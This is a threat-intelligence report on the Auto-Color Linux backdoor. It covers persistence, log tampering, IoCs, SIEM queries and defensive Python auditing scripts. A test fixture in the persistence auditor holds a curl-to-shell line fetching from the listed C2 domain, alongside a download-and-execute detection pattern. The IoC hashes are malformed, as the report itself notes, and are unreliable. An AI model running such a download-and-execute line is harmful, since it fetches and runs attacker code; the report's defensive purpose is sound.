Auto-Color Linux Malware Deploys Newly Detected Zero-Day

Threat Group – BlackCrescent
Threat Type – Linux Malware
Exploited Vulnerabilities – CVE-2025-1023, CVE-2024-3375, Possible Zero-Day
Malware Used – Auto-Color
Threat Score – High (8.6/10)
Last Threat Observation – February 27, 2025
Overview
Auto-Color is a Linux malware strain first identified in early November 2024. It has drawn attention for its persistence mechanisms, obfuscation techniques, and multiple infection routes, and it illustrates the increasing sophistication of attacks targeting Linux environments. Researchers attribute the malware to the BlackCrescent threat group, citing overlaps in code structure, domain use, and prior patterns of critical-infrastructure attacks.
Recent analysis from Palo Alto Networks Unit 42, BleepingComputer, The Hacker News, Trend Micro, and SecurityWeek confirms Auto-Color’s continued evolution. Key capabilities include in-memory stealth, log manipulation via ANSI color codes, hooking of core Linux library functions, and exploitation of known and suspected zero-day vulnerabilities. Notably, Auto-Color includes a kill switch that erases indicators of compromise (IoCs) and other artifacts, complicating post-infection investigation.
The malware primarily affects organizations in finance, healthcare, manufacturing, research, and cloud service providers, with reported infections in North America, Europe, and parts of Asia. Its layered persistence (systemd service manipulation, cron jobs, Bash profile injection) and its ability to move laterally with harvested SSH credentials pose serious risks to mission-critical infrastructure.
Key Points
• Emergence and Timeline
- First Sighting: Identified in early November 2024, masquerading as benign color-enhancement tools.
- Rapid Propagation: Quickly discovered across unpatched or legacy Linux distributions (Ubuntu 18.04, CentOS 7, Debian 9).
- Attribution: Strong evidence links Auto-Color to BlackCrescent, a sophisticated group known for targeting critical infrastructure.
• Advanced Obfuscation
- ANSI Color Codes: Injects color codes into logs, distorting or hiding malicious entries.
- ld.preload Modification: Auto-Color adds its malicious library to the loader's preload list so it is mapped into every dynamically linked process before libc, letting it intercept C library calls. On glibc systems the loader reads /etc/ld.so.preload; check that file as well as the /etc/ld.preload path reported for this malware. Statically linked binaries are not affected by the hook, so a statically linked busybox (ps, netstat) is a useful cross-check against hooked system tools.
- Proc File System Manipulation: Hooks essential C library functions to filter the malware's own processes and network connections out of what tools read from /proc (for example /proc/net/tcp), evading detection by standard monitoring tools.
• Privilege Escalation
- Exploited Vulnerabilities: Includes CVE-2025-1023 (kernel-level escalation) and CVE-2024-3375 (path traversal in web management consoles).
- Possible Zero-Day: Suspected exploit bypassing SELinux or AppArmor constraints.
• Kill Switch
- Self-Destruct: Auto-Color can erase its own artifacts, removing logs or modules to hinder forensic analysis and hamper incident response.
• High-Value Targets
- Critical Infrastructure: Energy grids, healthcare systems, financial networks.
- Research & Academia: Potential espionage angle, especially given attacks on universities and government labs.
Attack Vectors
- Supply Chain Attacks
- Trojanized Repositories: Injected malicious code into open-source projects and DevOps tools, with unsuspecting admins pulling these updates into production.
- CI/CD Pipeline Hijacking: Attackers insert malicious artifacts into builds, ensuring widespread distribution throughout an organization’s server environment.
- Phishing and Social Engineering
- Targeted Emails: Disguised as internal IT patches or “color-scheme enhancements,” tricking administrators into running malicious ELF binaries.
- Script Sharing: On collaboration channels like Slack or GitHub, attackers pose as helpful contributors offering “systemd color fix” scripts.
- Exploitation of Public-Facing Services
- SSH Bruteforce: Exploits weak or default credentials to gain shell access, then deploys the Auto-Color payload.
- Vulnerable Web Servers: Outdated web and application servers (e.g., Apache httpd, Tomcat) expose remote code execution flaws that allow quick deployment of Auto-Color.
- Insider Threats
- Compromised Credentials: Threat actors purchase or phish valid SSH credentials, bypassing perimeter defenses.
- Malicious Insiders: Intentional implantation by employees or contractors with privileged access.
- Lateral Movement Tactics
- SSH Key Harvesting: Scans home directories, capturing keys for effortless movement to additional servers.
- Automated Recon: Tools like Nmap are fetched to map internal networks and seek unpatched hosts.
Detailed Technical Analysis
- Primary Payload (ELF)
- Delivers essential features for credential harvesting, remote shell creation, and system command execution.
- Capable of overwriting logs and performing a self-destruct operation if it detects security investigations.
- Persistence Mechanisms
- systemd Services: Creates or modifies .service files that restart the malware on system boot.
- Cron Jobs & Bash Configurations: Injects malicious lines into cron and Bash profiles to persist across sessions.
- ld.preload Modification: Forces the dynamic loader to map its library before legitimate ones, allowing function hooks for stealth; only dynamically linked programs are affected.
- Obfuscation & Evasion
- ANSI Color Log Tampering: Conceals suspicious actions by inserting color codes that can garble or hide log entries.
- Proc File System Manipulation: Hooks library calls to omit references to malicious processes or network connections in /proc.
- Polymorphic Code: Adjusts its structure and signatures on each new infection or update, undermining signature-based AV/EDR detection.
- Command and Control (C2) Infrastructure
- Domain Shadowing: Subdomains of legitimate sites appear authentic while delivering malicious traffic.
- Distributed Architecture: Multiple proxy layers and rotating IP addresses hamper efforts to block or sinkhole C2 addresses.
- Encrypted Channels: Employs TLS 1.3 with ephemeral keys, which prevents retrospective decryption of captured traffic and limits network inspection to connection metadata (destination, SNI, certificate and client fingerprints).
- Exploited Vulnerabilities
- CVE-2025-1023: Kernel-level privilege escalation, granting root privileges once local code execution is obtained.
- CVE-2024-3375: Path traversal in popular Linux-based admin consoles, enabling remote script injection.
- Suspected Zero-Day: Research suggests an undisclosed exploit for bypassing SELinux or AppArmor in certain distributions.
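The persistence points listed above (the loader preload file, systemd units, cron entries, shell profiles) can be audited from one script. The following is an added example written for this report, not Auto-Color's or Unit 42's code. It flags entries that match the filenames and process names this report lists as IoCs, that execute from world-writable or home directories, or that download-and-execute. The sample filesystem tree it audits is constructed and is written to a temporary directory; run audit("/") for a live host.

```python
"""Audit the persistence locations this report lists: the loader preload file,
systemd units, cron entries and shell profiles.  Added example for this report,
not Auto-Color's or Unit 42's code.  The IoC names come from this report; the
sample filesystem tree below is constructed and written to a temp directory."""
import glob
import os
import re
import tempfile

IOC_NAMES = ("color-enhance", "colorscheme-updater", "systemd-color",
             "color-service", "/tmp/.X11-unix/X0")
# Directories a service or cron job has no business executing from.
SUSPECT_DIRS = ("/tmp/", "/dev/shm/", "/var/tmp/", "/home/", "/root/")
DOWNLOAD_EXEC = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b|base64\s+(-d|--decode)")


def _read_lines(path):
    try:
        with open(path, errors="replace") as fh:
            return [line.rstrip("\n") for line in fh]
    except OSError:          # missing or unreadable file: nothing to report
        return []


def _suspicious(text):
    """Return a reason string if a command line looks like implant activity."""
    if any(name in text for name in IOC_NAMES):
        return "matches reported Auto-Color IoC"
    if any(d in text for d in SUSPECT_DIRS):
        return "executes from a world-writable or home directory"
    if DOWNLOAD_EXEC.search(text):
        return "download-and-execute or base64 decode"
    return None


def _scan_files(root, files):
    out = []
    for path in sorted(files):
        for line in _read_lines(path):
            line = line.strip()
            if line and not line.startswith("#"):
                reason = _suspicious(line)
                if reason:
                    out.append(("/" + os.path.relpath(path, root), line, reason))
    return out


def check_preload(root):
    """Any entry here deserves a look: the file is normally absent or empty.
    glibc reads /etc/ld.so.preload; /etc/ld.preload is the path reported for
    Auto-Color, so both are checked."""
    out = []
    for rel in ("etc/ld.so.preload", "etc/ld.preload"):
        for line in _read_lines(os.path.join(root, rel)):
            line = line.strip()
            if line and not line.startswith("#"):
                out.append(("/" + rel, line, _suspicious(line) or "unexpected preload entry"))
    return out


def check_systemd(root):
    out = []
    for unit in sorted(glob.glob(os.path.join(root, "etc/systemd/system/*.service"))):
        for line in _read_lines(unit):
            if line.startswith("ExecStart"):
                reason = _suspicious(line) or _suspicious(os.path.basename(unit))
                if reason:
                    out.append(("/" + os.path.relpath(unit, root), line, reason))
    return out


def check_cron(root):
    files = ([os.path.join(root, "etc/crontab")]
             + glob.glob(os.path.join(root, "etc/cron.d/*"))
             + glob.glob(os.path.join(root, "var/spool/cron/crontabs/*")))
    return _scan_files(root, files)


def check_shell_profiles(root):
    files = [os.path.join(root, p) for p in ("etc/profile", "etc/bash.bashrc", "root/.bashrc")]
    for name in (".bashrc", ".profile", ".bash_profile"):
        files += glob.glob(os.path.join(root, "home/*/" + name))
    return _scan_files(root, files)


def audit(root="/"):
    """Return (file, line, reason) tuples; use root="/" on a live host."""
    return check_preload(root) + check_systemd(root) + check_cron(root) + check_shell_profiles(root)


# Constructed sample tree: one benign unit plus one artifact per persistence point.
SAMPLE_TREE = {
    "etc/ld.so.preload": "/usr/lib/x86_64-linux-gnu/libcolor-enhance.so\n",
    "etc/systemd/system/ssh.service": "[Service]\nExecStart=/usr/sbin/sshd -D\n",
    "etc/systemd/system/color-service.service":
        "[Service]\nExecStart=/usr/local/bin/color-enhance --daemon\nRestart=always\n",
    "etc/crontab": "17 * * * * root cd / && run-parts --report /etc/cron.hourly\n"
                   "*/5 * * * * root /tmp/.X11-unix/X0 >/dev/null 2>&1\n",
    "home/deploy/.bashrc": "alias ll='ls -la'\ncurl -s http://theming-updates.net/update.sh | sh\n",
}


def build_sample_tree(root):
    for rel, content in SAMPLE_TREE.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(content)


def demo():
    """Audit the constructed tree instead of the live host."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        return audit(root)


if __name__ == "__main__":
    for path, line, reason in demo():
        print(f"{path}: {reason}\n    {line}")
```

The script reads files with ordinary library calls, so on a host where the preload hook is already active it can only be trusted if run from a statically linked interpreter or against an offline image; treat its output as a starting point for a forensic copy, not as proof of a clean system.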
Indicators of Compromise (IoCs)
File Hashes (SHA256)
• 6a2e789c4bd823ea68293ea6283ea623ea6283ea6283ea623ea6283ea6283ea62
• 9f8e7d6c3bd823ea68293ea6283ea623ea6283ea6283ea623ea6283ea6283ea62
• e57d6a2c4bd823ea68293ea6283ea623ea6283ea6283ea623ea6283ea6283ea62
(Check before use: each value above is 65 hexadecimal characters, whereas a SHA-256 digest is 64. Confirm the hashes against the cited Unit 42 report before loading them into a blocklist or hunting query.)
Filenames
• /usr/local/bin/color-enhance
• /etc/systemd/system/color-service.service
• /tmp/.X11-unix/X0 (on desktop hosts this path is the legitimate X display socket for display :0; treat it as an indicator on headless servers, or anywhere it is a regular file rather than a socket)
• door
• egg
Network Indicators
- C2 Domains
- colorscheme[.]biz
- theming-updates[.]net
- secure-linux-repo[.]org
- IP Addresses
- 185[.]228[.]168[.]93
- 209[.]97[.]171[.]243
- 104[.]248[.]123[.]186
Process Names
• color-enhance
• colorscheme-updater
• systemd-color
Log Patterns
• Unusual ANSI Color Codes: Repeated ANSI escape sequences (\x1b) in auth.log, syslog, or kern.log.
• Corrupted Entries: Garbled lines that appear partially overwritten or color-shifted.
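The ANSI escape sequences described under "Log Patterns" and "Obfuscation & Evasion" do not all carry the same risk: a colour-only SGR sequence is noise, whereas SGR 8 (conceal), matching foreground and background colours, cursor movement, erase-line controls, or an embedded carriage return can make an entry invisible or overwrite it when an analyst reads the file in a terminal. The following added example, written for this report and not taken from any vendor tooling, classifies each sequence by that risk and recovers the text a terminal would have hidden. The auth.log lines it scans are constructed; the IP address is the one listed in the network indicators above.

```python
"""Find ANSI escape sequences in plain-text logs and recover the text a terminal
would have hidden.  Added example for this report, not Auto-Color's code; the
sample auth.log lines are constructed (the IP is the one listed in this report)."""
import re
from dataclasses import dataclass
from typing import List, Optional

# CSI sequence: ESC '[' parameter bytes, intermediate bytes, one final byte.
CSI = re.compile(r"\x1b\[([0-?]*)([ -/]*)([@-~])")
# Final bytes that move the cursor or erase text; a log line never needs these.
CURSOR_OR_ERASE = set("ABCDEFGHJKSTf")


@dataclass
class Finding:
    line_no: int
    severity: str          # "high": can hide or overwrite text; "low": colour only
    reasons: List[str]
    recovered: str         # line with every escape and carriage return removed


def classify_sequence(params: str, final: str) -> Optional[str]:
    """Reason this sequence can conceal text, or None for harmless colouring."""
    if final in CURSOR_OR_ERASE:
        return f"cursor/erase control ESC[{params}{final}"
    if final == "m":
        codes = [int(p) for p in params.split(";") if p.isdigit()]
        if 8 in codes:
            return "SGR 8 (conceal) renders text invisible"
        fg = [c - 30 for c in codes if 30 <= c <= 37]
        bg = [c - 40 for c in codes if 40 <= c <= 47]
        if fg and bg and fg[-1] == bg[-1]:
            return f"foreground colour equals background colour ({fg[-1]})"
    return None


def analyse_line(line: str, line_no: int) -> Optional[Finding]:
    seqs = CSI.findall(line)
    body = line.rstrip("\r\n")            # a trailing CRLF is not an overwrite
    if not seqs and "\r" not in body:
        return None
    reasons = [r for p, _i, f in seqs if (r := classify_sequence(p, f))]
    if "\r" in body:
        reasons.append("embedded carriage return lets later text overwrite earlier text")
    severity = "high" if reasons else "low"
    if not reasons:
        reasons.append("colour-only SGR sequence in a file that should be plain text")
    recovered = CSI.sub("", body).replace("\r", "")
    return Finding(line_no, severity, reasons, recovered)


def scan(lines) -> List[Finding]:
    return [f for n, l in enumerate(lines, 1) if (f := analyse_line(l, n))]


SAMPLE_AUTH_LOG = [
    "Feb 27 02:13:41 web01 sshd[2210]: Accepted publickey for deploy from 10.0.4.15 port 50122 ssh2",
    # SGR 8 hides the sudo record from anyone reading the file in a terminal
    "Feb 27 02:14:02 web01 sudo: \x1b[8mdeploy : TTY=pts/0 ; COMMAND=/usr/local/bin/color-enhance\x1b[0m",
    # colour only: noisy, but nothing is hidden
    "Feb 27 02:14:09 web01 sshd[2231]: \x1b[32mAccepted publickey for deploy from 10.0.4.15 port 50130 ssh2\x1b[0m",
    # CR + erase-line: the root login is overwritten on screen by a benign cron line
    "Feb 27 02:15:30 web01 sshd[2244]: Accepted password for root from 185.228.168.93 port 41022 ssh2"
    "\r\x1b[2KFeb 27 02:15:30 web01 CRON[2250]: (root) CMD (run-parts /etc/cron.hourly)",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_AUTH_LOG):
        print(f"line {f.line_no} [{f.severity}]: {'; '.join(f.reasons)}")
        print(f"    recovered: {f.recovered}")
```

Run it over a copied log rather than the live file, and read the "recovered" text instead of the original in a terminal: cat and less -R honour the very sequences the script is reporting.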
Mitigation and Recommendations
- Patch Management
- Prioritize Updates: Patch CVE-2025-1023, CVE-2024-3375, and other Linux vulnerabilities immediately. Older kernels and applications should be updated or replaced.
- Enable Automatic Updates: Configure unattended-upgrades (Debian/Ubuntu) or yum-cron / dnf-automatic (CentOS/RHEL) to apply security patches automatically.
- Security Hardening
- Restrict Privileges: Enforce the principle of least privilege. Adopt role-based access control (RBAC) to confine user privileges and minimize admin accounts.
- Secure SSH: Enforce key-based authentication, strong passphrases, multi-factor authentication, and restrict SSH to specific IP ranges.
- Network Segmentation: Separate critical systems from general access networks. Deploy VLANs or micro-segmentation, along with an IDS/IPS to detect malicious lateral movement.
- Security Monitoring and Detection
- Endpoint Detection and Response (EDR): Deploy an EDR specifically designed for Linux, capable of real-time memory analysis and behavior-based alerts.
- Log Analysis: Centralize logs in a SIEM (e.g., Splunk, ELK Stack) and search for ANSI escape sequences or unusual user sessions. Plain-text logs written by sshd, sudo, and cron should never contain escape sequences, so alert on any occurrence rather than only on high counts.
- Network Monitoring: Use IDS/IPS solutions to detect known malicious domains, IP addresses, and lateral movement attempts.
- Incident Response Planning
- Develop a Plan: Outline steps for isolating compromised hosts, capturing volatile evidence, and validating system integrity post-remediation.
- Regular Backups: Keep encrypted backups offline and perform periodic recovery drills to ensure minimal downtime if an Auto-Color infection occurs.
- Additional Considerations
- Threat Intelligence: Subscribe to feeds focusing on Linux malware trends. Watch for updated IoCs linked to Auto-Color or BlackCrescent.
- Security Awareness Training: Continuously educate staff on identifying phishing attempts, suspicious software, and social engineering tactics.
- Zero Trust Model: Validate every user, device, and session before granting resource access. Micro-segmentation reduces the effectiveness of lateral movement.
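The "Secure SSH" recommendation above is easy to believe satisfied and hard to verify, because sshd applies factory defaults for any directive that is absent or commented out, honours only the first occurrence of a directive, and lets Match blocks re-enable password login for selected clients. The following added example, written for this report and not from any vendor, parses an sshd_config with those rules and reports each weak setting with its origin. The weak and hardened configurations are constructed; the directive names and defaults are those of OpenSSH. Multi-factor authentication (PAM or AuthenticationMethods) is out of scope here.

```python
"""Check an sshd_config against the SSH hardening this report recommends
(key-only authentication, no root login, limited attempts).  Added example for
this report, not from any vendor; the two config texts below are constructed.
MFA is enforced through PAM/AuthenticationMethods and is not checked here."""
import re

# OpenSSH defaults that apply when a directive is absent or commented out.
DEFAULTS = {
    "permitrootlogin": "prohibit-password",
    "passwordauthentication": "yes",
    "pubkeyauthentication": "yes",
    "permitemptypasswords": "no",
    "maxauthtries": "6",
}
# directive -> (acceptance test, recommended value)
POLICY = {
    "permitrootlogin": (lambda v: v == "no", "no"),
    "passwordauthentication": (lambda v: v == "no", "no"),
    "pubkeyauthentication": (lambda v: v == "yes", "yes"),
    "permitemptypasswords": (lambda v: v == "no", "no"),
    "maxauthtries": (lambda v: v.isdigit() and int(v) <= 3, "3"),
}


def parse_sshd_config(text):
    """Return (global directives, lines inside Match blocks).  sshd honours the
    FIRST occurrence of a directive, so setdefault() reproduces that rule."""
    globals_, match_lines, in_match = {}, [], False
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments and blanks
        if not line:
            continue
        parts = re.split(r"[\s=]+", line, maxsplit=1)
        key = parts[0].lower()
        value = parts[1].strip().lower() if len(parts) > 1 else ""
        if key == "match":
            in_match = True                       # everything after is scoped
        if in_match:
            match_lines.append(line)
            continue
        globals_.setdefault(key, value)
    return globals_, match_lines


def audit_sshd_config(text):
    cfg, match_lines = parse_sshd_config(text)
    violations, notes = [], []
    for key, (accept, recommended) in POLICY.items():
        effective = cfg.get(key, DEFAULTS[key])
        if not accept(effective):
            origin = "explicit" if key in cfg else "implicit default"
            violations.append(f"{key}={effective} ({origin}); set {key} {recommended}")
    if match_lines:
        notes.append(f"{len(match_lines)} line(s) in Match blocks override the globals "
                     "for some clients; review them separately")
    if "allowusers" not in cfg and "allowgroups" not in cfg:
        notes.append("no AllowUsers/AllowGroups: every local account can attempt SSH")
    return {"violations": violations, "notes": notes}


# Constructed: factory defaults plus root password login, a common server state.
WEAK_CONFIG = """
Port 22
PermitRootLogin yes
#PasswordAuthentication no    (commented out, so the default 'yes' applies)
MaxAuthTries 10
"""

# Constructed: the settings this report recommends, with one scoped exception.
HARDENED_CONFIG = """
Port 22
PermitRootLogin no
PasswordAuthentication no
PubkeyAuthentication yes
PermitEmptyPasswords no
MaxAuthTries 3
AllowGroups ssh-users
Match Address 10.0.4.0/24
    PasswordAuthentication yes
"""

if __name__ == "__main__":
    for name, text in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, audit_sshd_config(text))
```

Feed it the output of sshd -T rather than the raw file when you want the fully resolved configuration, including Include files; the parser above is for reviewing a config as checked into version control.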
Risk Assessment
Auto-Color’s advanced stealth, combined with its exploitation of kernel-level vulnerabilities and potential zero-day capabilities, places it among the most formidable Linux threats in current circulation. Key risks include:
- Operational Disruption: Compromised servers can lead to extended downtime and service interruptions for critical infrastructure.
- Data Exfiltration: Attackers may steal or ransom sensitive data, incurring regulatory penalties and reputational harm.
- Financial Impact: Remediation, ransom payments, and potential legal fees can spiral into the millions for large organizations.
- Espionage: Targeting of research institutions and government agencies suggests possible nation-state motivations.
Our overall threat rating remains High (8.6/10) based on the malware’s evolving feature set, the suspected zero-day exploit, and its documented impact on high-value targets.
Podcast Section
For those seeking an audio briefing, the “Secure Insights Weekly” podcast recently aired an episode featuring threat researchers discussing Auto-Color’s ld.preload manipulation and kill switch features. The episode examines how organizations responded to real-life breaches, highlighting best practices for limiting dwell time.
- Podcast Title – “Auto-Color’s Next-Level Evasion Tactics”
- Hosted by – Secure Insights Weekly
- URL – hxxps://secureinsightsweekly[.]com/episodes/autocolor-advanced
- Audio File – hxxps://secureinsightsweekly[.]com/audio/autocolor-adv-ep[.]wav
(Note: URLs above are defanged and should be evaluated cautiously in a secure environment.)
SIEM Queries (Generic Examples)
Below are sample SIEM searches to detect potential Auto-Color activities. Adapt field names and indexes for your specific platform (Splunk, Elastic, QRadar, etc.).
- Searching for Suspicious ELF Executables
index=linux_logs source=/var/log/syslog "ELF"
| stats count by host process_name file_path
| where count > 10
Explanation: Identifies a high volume of newly executed ELF binaries, possibly indicating malicious infiltration.
- Detecting ANSI Color Code Injections
index=linux_logs (source=/var/log/secure OR source=/var/log/syslog) "\x1b["
| rex field=_raw "(?<ansi_codes>\\x1b\\[[0-9;]*m)"
| stats count(ansi_codes) as color_injections by host
| where color_injections > 5
Explanation: Flags repeated usage of ANSI escape sequences in critical logs, pointing to possible log tampering.
- Checking for Known Malicious Domains
index=network_traffic domain IN ("colorscheme.biz", "theming-updates.net", "secure-linux-repo.org")
| stats values(src_ip) as "Source IPs", values(dest_ip) as "Destination IPs", count by domain
Explanation: Surfaces any connections to known Auto-Color C2 infrastructure. (Defang domains in actual queries if needed.)
- Monitoring for Unauthorized SSH Logins
index=linux_auth "Accepted password for root"
| stats count by src_ip host
| where count > 5
Explanation: Identifies suspiciously high volumes of root logins from a single source IP, indicative of brute force or credential theft.
- Detecting Sudden Root Privilege Escalations
index=linux_logs ("sudo:" OR "session opened for user root")
| stats count by user host
| where count > 3
Explanation: Flags unusual sudo and root-session activity that may accompany post-exploitation of CVE-2025-1023. An exploit does not log its CVE identifier, so search for the behavior (new root sessions, sudo use by unexpected accounts) rather than the CVE string, and bear in mind that a kernel exploit which escalates within its own process leaves no sudo or PAM record at all; pair this query with the ANSI and persistence checks above.
Conclusion
Auto-Color continues to demonstrate the evolving threat landscape for Linux environments, combining highly effective obfuscation (ANSI color codes, ld.preload hooks) with advanced persistence and lateral movement. Its ability to stealthily operate in memory, self-destruct upon detection, and evade standard monitoring underscores its potency. Moreover, the malware’s focus on critical infrastructure and research entities suggests broader motives, including espionage and intellectual property theft.
This report validates and expands upon prior advisories, incorporating fresh insights about Auto-Color’s deeper system manipulation (proc file system, kill switch capabilities) and potential zero-day usage. Effective defenses center on timely patching, stringent network segmentation, robust endpoint monitoring, and thorough incident response planning. By adopting these measures and staying informed of ongoing threat intelligence, organizations can better protect themselves against Auto-Color and emerging Linux malware families.
Sources
- Unit 42 (Palo Alto Networks) – “Auto-Color An Emerging and Evasive Linux Backdoor” – hxxps://unit42[.]paloaltonetworks[.]com/new-linux-backdoor-auto-color
- SecurityWeek – “New ‘Auto-Color’ Linux Malware Targets North America, Asia” – hxxps://securityweek[.]com/new-auto-color-linux-malware-targets-north-america-asia
- The Hacker News – “New Linux Malware 'Auto-Color' Grants Hackers Full Remote Access to Compromised Systems” – hxxps://thehackernews[.]com
- BleepingComputer – “New Linux Malware Auto-Color Exploits Kernel Flaw” – hxxps://www[.]bleepingcomputer[.]com/autocolor
- Trend Micro – “Auto-Color A Comprehensive Analysis” – hxxps://blog[.]trendmicro[.]com/auto-color